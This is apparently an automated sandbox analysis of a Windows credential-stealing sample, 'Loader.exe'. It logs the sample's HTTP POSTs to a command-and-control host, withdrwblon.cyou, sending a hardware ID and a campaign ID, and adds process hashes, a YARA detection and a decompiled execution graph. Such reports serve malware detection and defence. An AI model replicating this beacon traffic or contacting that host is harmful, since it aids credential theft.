                                                                2024-10-24 19:51:14 UTC5071OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 b6 b9 fe 28 58 da f6 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5
                                                                Data Ascii: (X6K~`iO\_,mi`m?ls}Qm/
                                                                2024-10-24 19:51:15 UTC1017INHTTP/1.1 200 OK
                                                                Date: Thu, 24 Oct 2024 19:51:15 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Set-Cookie: PHPSESSID=1m9dvf5lrg85in84hup5h4hd9t; expires=Mon, 17 Feb 2025 13:37:54 GMT; Max-Age=9999999; path=/
                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                Pragma: no-cache
                                                                cf-cache-status: DYNAMIC
                                                                vary: accept-encoding
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7ihJSHfg%2Bp5F0IbM0L2bQPZ%2BJKjftz4vj5ryr8q5ZIbA9P%2Bwo3tuM%2BvbtiMJCKzZYZdkLZ41dxWrm7tHI%2FTUQ6agujMuiSgJoJXN9IyjQ6Nenq8ayfxYMoJSP%2FQixSojVWfT"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d7c801dc8a06b2d-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1088&sent=12&recv=28&lost=0&retrans=0&sent_bytes=2838&recv_bytes=21364&delivery_rate=2581105&cwnd=251&unsent_bytes=0&cid=60dfb33c177305c0&ts=878&x=0"
                                                                2024-10-24 19:51:15 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 0d 0a
                                                                Data Ascii: 11ok 173.254.250.71
                                                                2024-10-24 19:51:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.749720188.114.96.34437388C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-24 19:51:16 UTC281OUTPOST /api HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                Content-Length: 1239
                                                                Host: withdrwblon.cyou
                                                                2024-10-24 19:51:16 UTC1239OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 43 33 42 35 46 43 34 46 46 34 31 39 31 38 44 30 41 45 35 33 44 31 34 44 43 41 45 45 30 37 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 71 6a 77 6f
                                                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"4C3B5FC4FF41918D0AE53D14DCAEE077--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HpOoIh--@qjwo
                                                                2024-10-24 19:51:17 UTC1008INHTTP/1.1 200 OK
                                                                Date: Thu, 24 Oct 2024 19:51:17 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Set-Cookie: PHPSESSID=0huc838kc6kq6s4m2oogk14t7q; expires=Mon, 17 Feb 2025 13:37:56 GMT; Max-Age=9999999; path=/
                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                Pragma: no-cache
                                                                cf-cache-status: DYNAMIC
                                                                vary: accept-encoding
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qdn9o%2BrzMeRL5HFqHsxwiYgU88YJ%2FiW9QbYoS7yYtSQMrNbpIF49%2Bqfby59SvcKqpZgg77fAH4EloNkJ1MnaO1z3awIkgA5mzeXtuE2qazCfgFjzd9qHXlNFLKLm0lJ6goFh"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d7c802b58f9e807-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1320&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=2156&delivery_rate=2098550&cwnd=251&unsent_bytes=0&cid=805d1983a4a1a211&ts=516&x=0"
                                                                2024-10-24 19:51:17 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 0d 0a
                                                                Data Ascii: 11ok 173.254.250.71
                                                                2024-10-24 19:51:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                6192.168.2.749728188.114.96.34437388C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-24 19:51:18 UTC281OUTPOST /api HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                Content-Length: 1135
                                                                Host: withdrwblon.cyou
                                                                2024-10-24 19:51:18 UTC1135OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 43 33 42 35 46 43 34 46 46 34 31 39 31 38 44 30 41 45 35 33 44 31 34 44 43 41 45 45 30 37 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 71 6a 77 6f
                                                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"4C3B5FC4FF41918D0AE53D14DCAEE077--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HpOoIh--@qjwo
                                                                2024-10-24 19:51:19 UTC1008INHTTP/1.1 200 OK
                                                                Date: Thu, 24 Oct 2024 19:51:19 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Set-Cookie: PHPSESSID=cv6mi24ct1dsa3a5t6mucqg7bm; expires=Mon, 17 Feb 2025 13:37:58 GMT; Max-Age=9999999; path=/
                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                Pragma: no-cache
                                                                cf-cache-status: DYNAMIC
                                                                vary: accept-encoding
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7FMbe6eXfACkoIdtnsBys0ig1pva%2B0OFk7TAuArI76AjCoG1pQMXC15vqjfGcia12b%2B3E5FdynpD4Sal7RIv1wZFHE2AbtdkB0dEUchbXQAc2I7%2Fm8JEZoGgoW2CadMsMllM"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d7c80376eea6b3b-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1102&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2837&recv_bytes=2052&delivery_rate=2513888&cwnd=248&unsent_bytes=0&cid=73413864e17fee0a&ts=714&x=0"
                                                                2024-10-24 19:51:19 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 0d 0a
                                                                Data Ascii: 11ok 173.254.250.71
                                                                2024-10-24 19:51:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                7192.168.2.749736188.114.96.34437388C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-24 19:51:20 UTC265OUTPOST /api HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                Content-Length: 115
                                                                Host: withdrwblon.cyou
                                                                2024-10-24 19:51:20 UTC115OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 40 71 6a 77 6f 31 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 34 43 33 42 35 46 43 34 46 46 34 31 39 31 38 44 30 41 45 35 33 44 31 34 44 43 41 45 45 30 37 37
                                                                Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--@qjwo1&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=4C3B5FC4FF41918D0AE53D14DCAEE077
                                                                2024-10-24 19:51:20 UTC1016INHTTP/1.1 200 OK
                                                                Date: Thu, 24 Oct 2024 19:51:20 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Set-Cookie: PHPSESSID=8g8f383d32sgqq08adhe08k834; expires=Mon, 17 Feb 2025 13:37:59 GMT; Max-Age=9999999; path=/
                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                Pragma: no-cache
                                                                cf-cache-status: DYNAMIC
                                                                vary: accept-encoding
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z%2FpAaKM702mV%2BWg%2FuCEy1wFn%2BWcyqTCDdVddKCsa87hSM3X8%2B3%2BMGR87tNpW6z8agYMAY02IzaXTOR9wdWU2awAMn6FnN4wFGn7upO3OWornb1AzKsLhbwilnky%2BYmd4fFUN"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d7c803f0cc98c56-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1380&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1016&delivery_rate=2045197&cwnd=135&unsent_bytes=0&cid=08c5d07164ec0295&ts=530&x=0"
                                                                2024-10-24 19:51:20 UTC54INData Raw: 33 30 0d 0a 73 6b 35 58 51 68 37 58 36 79 45 6c 65 5a 6e 61 69 4a 41 68 64 70 58 7a 68 59 30 39 38 67 37 4a 33 59 41 47 4f 79 78 6b 56 30 54 70 45 77 3d 3d 0d 0a
                                                                Data Ascii: 30sk5XQh7X6yEleZnaiJAhdpXzhY098g7J3YAGOyxkV0TpEw==
                                                                2024-10-24 19:51:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Click to jump to process

                                                                Click to jump to process

                                                                Click to dive into process behavior distribution

                                                                Click to jump to process

                                                                Target ID:5
                                                                Start time:15:51:04
                                                                Start date:24/10/2024
                                                                Path:C:\Users\user\Desktop\Loader.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\Loader.exe"
                                                                Imagebase:0xf00000
                                                                File size:392'704 bytes
                                                                MD5 hash:C92BAAA9C4217759880A0FF0904695D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:6
                                                                Start time:15:51:04
                                                                Start date:24/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff75da10000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:8
                                                                Start time:15:51:05
                                                                Start date:24/10/2024
                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                                                                Imagebase:0x890000
                                                                File size:43'016 bytes
                                                                MD5 hash:5D1D74198D75640E889F0A577BBF31FC
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1329981970.00000000036A9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:moderate
                                                                Has exited:true

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:9.8%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:10.3%
                                                                  Total number of Nodes:1977
                                                                  Total number of Limit Nodes:11
                                                                  execution_graph 13923 6d7e12ff 13924 6d7e1323 13923->13924 13925 6d7e1311 13923->13925 13927 6d7e1400 __CreateFrameInfo 49 API calls 13924->13927 13925->13924 13926 6d7e1319 13925->13926 13929 6d7e1400 __CreateFrameInfo 49 API calls 13926->13929 13932 6d7e1321 13926->13932 13928 6d7e1328 13927->13928 13930 6d7e1400 __CreateFrameInfo 49 API calls 13928->13930 13928->13932 13931 6d7e1341 13929->13931 13930->13932 13933 6d7e1400 __CreateFrameInfo 49 API calls 13931->13933 13934 6d7e134c 13933->13934 13935 6d7e3efa _unexpected 39 API calls 13934->13935 13936 6d7e1354 13935->13936 13937 6d7ea9f7 13938 6d7eaa10 __startOneArgErrorHandling 13937->13938 13940 6d7eaa61 __startOneArgErrorHandling 13938->13940 13941 6d7eae44 13938->13941 13942 6d7eae7d __startOneArgErrorHandling 13941->13942 13944 6d7eaea4 __startOneArgErrorHandling 13942->13944 13952 6d7eb1b5 13942->13952 13945 6d7eaee7 13944->13945 13946 6d7eaec2 13944->13946 13964 6d7eb4a6 13945->13964 13956 6d7eb4d7 13946->13956 13949 6d7eaee2 __startOneArgErrorHandling 13950 6d7de360 _ValidateLocalCookies 5 API calls 13949->13950 13951 6d7eaf0b 13950->13951 13951->13940 13953 6d7eb1e0 __raise_exc 13952->13953 13954 6d7eb3d9 RaiseException 13953->13954 13955 6d7eb3f1 13954->13955 13955->13944 13957 6d7eb4e4 13956->13957 13958 6d7eb4f3 __startOneArgErrorHandling 13957->13958 13961 6d7eb522 __startOneArgErrorHandling 13957->13961 13959 6d7eb4a6 __startOneArgErrorHandling 14 API calls 13958->13959 13960 6d7eb50c 13959->13960 13960->13949 13962 6d7eb570 13961->13962 13963 6d7eb4a6 __startOneArgErrorHandling 14 API calls 13961->13963 13962->13949 13963->13962 13965 6d7eb4ca 13964->13965 13966 6d7eb4b3 13964->13966 13967 6d7e4970 __dosmaperr 14 API calls 13965->13967 13968 6d7eb4cf 13966->13968 13969 6d7e4970 __dosmaperr 14 API calls 13966->13969 13967->13968 13968->13949 13970 6d7eb4c2 13969->13970 13970->13949 12980 6d7cc870 12983 6d7cc88a 12980->12983 12981 6d7cc9ba 12982 6d7dc8a0 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 12982->12983 12983->12981 12983->12982 12984 6d7d7170 12986 6d7d7180 12984->12986 12988 6d7d6e90 12986->12988 12989 6d7d6edb 12988->12989 12990 6d7d7124 12989->12990 12991 6d7df913 14 API calls ___std_exception_destroy 12989->12991 12991->12989 13971 6d7e7df0 13974 6d7e7e07 13971->13974 13973 6d7e7e02 13975 6d7e7e29 13974->13975 13976 6d7e7e15 13974->13976 13978 6d7e7e43 13975->13978 13979 6d7e7e31 13975->13979 13977 6d7e4970 __dosmaperr 14 API calls 13976->13977 13981 6d7e7e1a 13977->13981 13980 6d7e7e41 13978->13980 13983 6d7e507a 39 API calls 13978->13983 13982 6d7e4970 __dosmaperr 14 API calls 13979->13982 13980->13973 13984 6d7e2e99 ___std_exception_copy 39 API calls 13981->13984 13985 6d7e7e36 13982->13985 13983->13980 13987 6d7e7e25 13984->13987 13986 6d7e2e99 ___std_exception_copy 39 API calls 13985->13986 13986->13980 13987->13973 12992 6d7e826e 12993 6d7e827b 12992->12993 12997 6d7e829d 12992->12997 12994 6d7e8289 DeleteCriticalSection 12993->12994 12995 6d7e8297 12993->12995 12994->12994 12994->12995 12996 6d7e49e0 __freea 14 API calls 12995->12996 12996->12997 13988 6d7df0ec 13991 6d7df913 13988->13991 13990 6d7df101 13992 6d7df927 13991->13992 13993 6d7df920 13991->13993 13992->13990 13994 6d7e3e86 ___std_exception_copy 14 API calls 13993->13994 13994->13992 12998 6d7e2b6c 13001 6d7e445c GetLastError 12998->13001 13002 6d7e4478 13001->13002 13003 6d7e4472 13001->13003 13004 6d7e6302 _unexpected 6 API calls 13002->13004 13007 6d7e447c SetLastError 13002->13007 13005 6d7e62c3 _unexpected 6 API calls 13003->13005 13006 6d7e4494 13004->13006 13005->13002 13006->13007 13009 6d7e4983 _unexpected 14 API calls 13006->13009 13011 6d7e2b71 13007->13011 13012 6d7e4511 13007->13012 13010 6d7e44a9 13009->13010 13013 6d7e44c2 13010->13013 13014 6d7e44b1 13010->13014 13028 6d7e3f90 13012->13028 13017 6d7e6302 _unexpected 6 API calls 13013->13017 13016 6d7e6302 _unexpected 6 API calls 13014->13016 13025 6d7e44bf 13016->13025 13019 6d7e44ce 13017->13019 13020 6d7e44e9 13019->13020 13021 6d7e44d2 13019->13021 13023 6d7e425e _unexpected 14 API calls 13020->13023 13024 6d7e6302 _unexpected 6 API calls 13021->13024 13022 6d7e49e0 __freea 14 API calls 13022->13007 13026 6d7e44f4 13023->13026 13024->13025 13025->13022 13027 6d7e49e0 __freea 14 API calls 13026->13027 13027->13007 13039 6d7e67df 13028->13039 13031 6d7e3fa0 13032 6d7e3fc9 13031->13032 13033 6d7e3faa IsProcessorFeaturePresent 13031->13033 13075 6d7e3404 13032->13075 13035 6d7e3fb6 13033->13035 13069 6d7e2c9d 13035->13069 13078 6d7e670d 13039->13078 13042 6d7e6824 13043 6d7e6830 __FrameHandler3::FrameUnwindToState 13042->13043 13044 6d7e45ad __dosmaperr 14 API calls 13043->13044 13045 6d7e6880 13043->13045 13047 6d7e6892 __FrameHandler3::FrameUnwindToState 13043->13047 13051 6d7e6861 __FrameHandler3::FrameUnwindToState 13043->13051 13044->13051 13046 6d7e4970 __dosmaperr 14 API calls 13045->13046 13048 6d7e6885 13046->13048 13049 6d7e68c8 __FrameHandler3::FrameUnwindToState 13047->13049 13092 6d7e4828 EnterCriticalSection 13047->13092 13089 6d7e2e99 13048->13089 13054 6d7e6905 13049->13054 13055 6d7e6a02 13049->13055 13065 6d7e6933 13049->13065 13051->13045 13051->13047 13068 6d7e686a 13051->13068 13061 6d7e445c _unexpected 39 API calls 13054->13061 13054->13065 13057 6d7e6a0d 13055->13057 13097 6d7e4870 LeaveCriticalSection 13055->13097 13059 6d7e3404 __FrameHandler3::FrameUnwindToState 21 API calls 13057->13059 13060 6d7e6a15 13059->13060 13063 6d7e6928 13061->13063 13062 6d7e445c _unexpected 39 API calls 13066 6d7e6988 13062->13066 13064 6d7e445c _unexpected 39 API calls 13063->13064 13064->13065 13093 6d7e69ae 13065->13093 13067 6d7e445c _unexpected 39 API calls 13066->13067 13066->13068 13067->13068 13068->13031 13070 6d7e2cb9 __FrameHandler3::FrameUnwindToState std::bad_exception::bad_exception 13069->13070 13071 6d7e2ce5 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 13070->13071 13072 6d7e2db6 __FrameHandler3::FrameUnwindToState 13071->13072 13073 6d7de360 _ValidateLocalCookies 5 API calls 13072->13073 13074 6d7e2dd4 13073->13074 13074->13032 13076 6d7e3241 __FrameHandler3::FrameUnwindToState 21 API calls 13075->13076 13077 6d7e3415 13076->13077 13079 6d7e6719 __FrameHandler3::FrameUnwindToState 13078->13079 13084 6d7e4828 EnterCriticalSection 13079->13084 13081 6d7e6727 13085 6d7e6769 13081->13085 13084->13081 13088 6d7e4870 LeaveCriticalSection 13085->13088 13087 6d7e3f95 13087->13031 13087->13042 13088->13087 13098 6d7e2de5 13089->13098 13092->13049 13094 6d7e697a 13093->13094 13095 6d7e69b2 13093->13095 13094->13062 13094->13066 13094->13068 13148 6d7e4870 LeaveCriticalSection 13095->13148 13097->13057 13099 6d7e2df7 ___std_exception_copy 13098->13099 13104 6d7e2e1c 13099->13104 13101 6d7e2e0f 13102 6d7e2bd5 ___std_exception_copy 39 API calls 13101->13102 13103 6d7e2e1a 13102->13103 13103->13068 13105 6d7e2e2c 13104->13105 13106 6d7e2e33 13104->13106 13115 6d7e2c3a GetLastError 13105->13115 13111 6d7e2e41 13106->13111 13119 6d7e2c11 13106->13119 13109 6d7e2e68 13109->13111 13122 6d7e2ec6 IsProcessorFeaturePresent 13109->13122 13111->13101 13112 6d7e2e98 13113 6d7e2de5 ___std_exception_copy 39 API calls 13112->13113 13114 6d7e2ea5 13113->13114 13114->13101 13116 6d7e2c53 13115->13116 13126 6d7e465e 13116->13126 13120 6d7e2c1c GetLastError SetLastError 13119->13120 13121 6d7e2c35 13119->13121 13120->13109 13121->13109 13123 6d7e2ed2 13122->13123 13124 6d7e2c9d __FrameHandler3::FrameUnwindToState 8 API calls 13123->13124 13125 6d7e2ee7 GetCurrentProcess TerminateProcess 13124->13125 13125->13112 13127 6d7e4677 13126->13127 13128 6d7e4671 13126->13128 13129 6d7e6302 _unexpected 6 API calls 13127->13129 13132 6d7e2c6b SetLastError 13127->13132 13130 6d7e62c3 _unexpected 6 API calls 13128->13130 13131 6d7e4691 13129->13131 13130->13127 13131->13132 13133 6d7e4983 _unexpected 14 API calls 13131->13133 13132->13106 13134 6d7e46a1 13133->13134 13135 6d7e46be 13134->13135 13136 6d7e46a9 13134->13136 13137 6d7e6302 _unexpected 6 API calls 13135->13137 13138 6d7e6302 _unexpected 6 API calls 13136->13138 13139 6d7e46ca 13137->13139 13140 6d7e46b5 13138->13140 13141 6d7e46ce 13139->13141 13142 6d7e46dd 13139->13142 13145 6d7e49e0 __freea 14 API calls 13140->13145 13143 6d7e6302 _unexpected 6 API calls 13141->13143 13144 6d7e425e _unexpected 14 API calls 13142->13144 13143->13140 13146 6d7e46e8 13144->13146 13145->13132 13147 6d7e49e0 __freea 14 API calls 13146->13147 13147->13132 13148->13094 12563 6d7de6ee 12564 6d7de72c 12563->12564 12565 6d7de6f9 12563->12565 12566 6d7de848 __DllMainCRTStartup@12 86 API calls 12564->12566 12567 6d7de71e 12565->12567 12568 6d7de6fe 12565->12568 12574 6d7de708 12566->12574 12575 6d7de741 12567->12575 12570 6d7de714 12568->12570 12571 6d7de703 12568->12571 12594 6d7de41d 12570->12594 12571->12574 12589 6d7de43c 12571->12589 12576 6d7de74d __FrameHandler3::FrameUnwindToState 12575->12576 12602 6d7de4ad 12576->12602 12578 6d7de754 __DllMainCRTStartup@12 12579 6d7de77b 12578->12579 12580 6d7de840 12578->12580 12586 6d7de7b7 ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState 12578->12586 12610 6d7de40f 12579->12610 12582 6d7ded57 __DllMainCRTStartup@12 4 API calls 12580->12582 12583 6d7de847 12582->12583 12584 6d7de78a __RTC_Initialize 12584->12586 12613 6d7defb2 InitializeSListHead 12584->12613 12586->12574 12587 6d7de798 12587->12586 12614 6d7de3e4 12587->12614 12663 6d7e3d9f 12589->12663 12866 6d7e0fcf 12594->12866 12597 6d7de426 12597->12574 12600 6d7de439 12600->12574 12601 6d7e0fda 21 API calls 12601->12597 12603 6d7de4b6 12602->12603 12618 6d7deb73 IsProcessorFeaturePresent 12603->12618 12607 6d7de4c7 12608 6d7de4cb 12607->12608 12609 6d7e0fe2 ___scrt_uninitialize_crt 7 API calls 12607->12609 12608->12578 12609->12608 12657 6d7de4e6 12610->12657 12612 6d7de416 12612->12584 12613->12587 12615 6d7de3e9 ___scrt_release_startup_lock 12614->12615 12616 6d7deb73 IsProcessorFeaturePresent 12615->12616 12617 6d7de3f2 12615->12617 12616->12617 12617->12586 12619 6d7de4c2 12618->12619 12620 6d7e0fb0 12619->12620 12628 6d7e14ee 12620->12628 12624 6d7e0fc1 12625 6d7e0fcc 12624->12625 12626 6d7e152a ___vcrt_uninitialize_locks DeleteCriticalSection 12624->12626 12625->12607 12627 6d7e0fb9 12626->12627 12627->12607 12629 6d7e14f7 12628->12629 12631 6d7e1520 12629->12631 12632 6d7e0fb5 12629->12632 12642 6d7e18d1 12629->12642 12633 6d7e152a ___vcrt_uninitialize_locks DeleteCriticalSection 12631->12633 12632->12627 12634 6d7e14a0 12632->12634 12633->12632 12647 6d7e17e2 12634->12647 12637 6d7e14b5 12637->12624 12640 6d7e14d0 12640->12624 12641 6d7e14d3 ___vcrt_uninitialize_ptd 6 API calls 12641->12637 12643 6d7e16f7 ___vcrt_InitializeCriticalSectionEx 5 API calls 12642->12643 12644 6d7e18eb 12643->12644 12645 6d7e1909 InitializeCriticalSectionAndSpinCount 12644->12645 12646 6d7e18f4 12644->12646 12645->12646 12646->12629 12648 6d7e16f7 ___vcrt_InitializeCriticalSectionEx 5 API calls 12647->12648 12649 6d7e17fc 12648->12649 12650 6d7e1815 TlsAlloc 12649->12650 12651 6d7e14aa 12649->12651 12651->12637 12652 6d7e1893 12651->12652 12653 6d7e16f7 ___vcrt_InitializeCriticalSectionEx 5 API calls 12652->12653 12654 6d7e18ad 12653->12654 12655 6d7e18c8 TlsSetValue 12654->12655 12656 6d7e14c3 12654->12656 12655->12656 12656->12640 12656->12641 12658 6d7de4f6 12657->12658 12659 6d7de4f2 12657->12659 12660 6d7ded57 __DllMainCRTStartup@12 4 API calls 12658->12660 12662 6d7de503 ___scrt_release_startup_lock 12658->12662 12659->12612 12661 6d7de56c 12660->12661 12662->12612 12669 6d7e4430 12663->12669 12666 6d7e0fda 12849 6d7e13d5 12666->12849 12670 6d7e443a 12669->12670 12671 6d7de441 12669->12671 12672 6d7e62c3 _unexpected 6 API calls 12670->12672 12671->12666 12673 6d7e4441 12672->12673 12673->12671 12674 6d7e6302 _unexpected 6 API calls 12673->12674 12675 6d7e4454 12674->12675 12677 6d7e42f7 12675->12677 12678 6d7e4312 12677->12678 